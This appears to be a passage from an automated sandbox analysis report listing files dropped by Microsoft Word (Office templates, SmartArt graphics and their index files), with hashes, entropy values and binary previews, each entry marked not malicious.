                                                                                                                                                                                                                                                                                                                                                                          SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):256
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.464918006641019
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                                                                                                                                                                                                                                                                                                                                          MD5:93149E194021B37162FD86684ED22401
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):51826
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.541375256745271
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                                                                                                                                                                                                                                          MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                                                                                                                                                                                                                                          SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):374
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5414485333689694
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                                                                                                                                                                                                                                                                                                                                                          MD5:2F7A8FE4E5046175500AFFA228F99576
                                                                                                                                                                                                                                                                                                                                                                          SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):47296
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.42327948041841
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                                                                                                                                                                                                                                                          MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                                                                                                                                                                                                                                                          SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):254
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4721586910685547
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUX9+RclTloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyteUTloGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:4DD225E2A305B50AF39084CE568B8110
                                                                                                                                                                                                                                                                                                                                                                          SHA1:C85173D49FC1522121AA2B0B2E98ADF4BB95B897
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:6F00DD73F169C73D425CB9895DAC12387E21C6E4C9C7DDCFB03AC32552E577F4
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:0493AB431004191381FF84AD7CC46BD09A1E0FEEC16B3183089AA8C20CC7E491FAE86FE0668A9AC677F435A203E494F5E6E9E4A0571962F6021D6156B288B28A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4243
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.824383764848892
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                                                                                                                                                                                                                                                          MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                                                                                                                                                                                                                                                          SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):258
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4692172273306268
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:C1B36A0547FB75445957A619201143AC
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):7370
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9204386289679745
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                                                                                                                                                                                                                                          MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                                                                                                                                                                                                                                          SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):252
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.48087342759872
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                                                                                                                                                                                                                                                                                                                                          SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):4326
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.821066198539098
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                                                                                                                                                                                                                                          MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                                                                                                                                                                                                                                          SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):262
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4901887319218092
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:52BD0762F3DC77334807DDFC60D5F304
                                                                                                                                                                                                                                                                                                                                                                          SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):5596
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.875182123405584
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                                                                                                                                                                                                                                                          MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                                                                                                                                                                                                                                                          SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.484503080761839
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                                                                                                                          MD5:1309D172F10DD53911779C89A06BBF65
                                                                                                                                                                                                                                                                                                                                                                          SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):9191
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.93263830735235
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                                                                                                                                                                                                                                          MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                                                                                                                                                                                                                                          SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
